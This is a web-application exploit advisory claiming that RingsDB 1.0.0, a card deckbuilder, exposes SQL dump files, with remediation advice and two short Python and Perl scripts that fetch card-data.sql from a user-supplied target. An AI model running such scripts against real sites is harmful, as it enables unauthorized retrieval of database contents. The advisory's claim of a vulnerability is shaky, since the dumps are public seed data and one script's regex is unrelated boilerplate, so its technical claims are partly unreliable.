RingsDB Software 1.0.0 Database Disclosure

RingsDB Software version 1.0.0 suffers from a database disclosure vulnerability.


MD5 | 471e6c02e01d3f19f34121044d85849e

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# Exploit Title : RingsDB Software 1.0.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : ringsdb.com
# Software Download Link : github.com/Sydtrack/ringsdb/archive/1.0.0.zip
# Software Information Link : ringsdb.com/about
# Software Version : 1.0.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

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# Information about Software :
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Deckbuilder for The Lord of the Rings (Physical / Digital) Library System.

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# Impact :
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* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

* It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

Very quick guide on how to install a local copy =>
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This guide assumes you know how to use the command-line and
that your machine has php and mysql installed.

install composer: getcomposer.org/download/
clone the repo somewhere
cd to it
run composer install (at the end it will ask for the database configuration parameters)
run php app/console doctrine:database:create
run php app/console doctrine:schema:create
import data into mysql
run php app/console server:run

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File :
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/card-data.sql

Information :
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-- MySQL dump 10.13 Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost Database: ringsdb
-- ------------------------------------------------------
-- Server version 5.6.21

-- Dumping data for table `card`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

raw.githubusercontent.com/Sydtrack/ringsdb/master/card-data.sql

File :
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/packs-data.sql

Information :
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-- MySQL dump 10.13 Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost Database: ringsdb
-- ------------------------------------------------------
-- Server version 5.6.21

-- Dumping data for table `cycle`

-- Dumping data for table `pack`

-- Dumping data for table `sphere`

-- Dumping data for table `type`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

raw.githubusercontent.com/Sydtrack/ringsdb/master/packs-data.sql

File :
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/scenario-data.sql

Information :
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-- MySQL dump 10.13 Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost Database: ringsdb
-- ------------------------------------------------------
-- Server version 5.6.21

-- Dumping data for table `encounter`

-- Dumping data for table `scenario`

-- Dumping data for table `scenario_encounter`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

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# Database Disclosure Information Exposure Exploit 1 :
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#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/card-data.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

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# Database Disclosure Information Exposure Exploit 2 :
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#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('RingsDB 1.0.0 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="card-data.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/card-data.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/card-data.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

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# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

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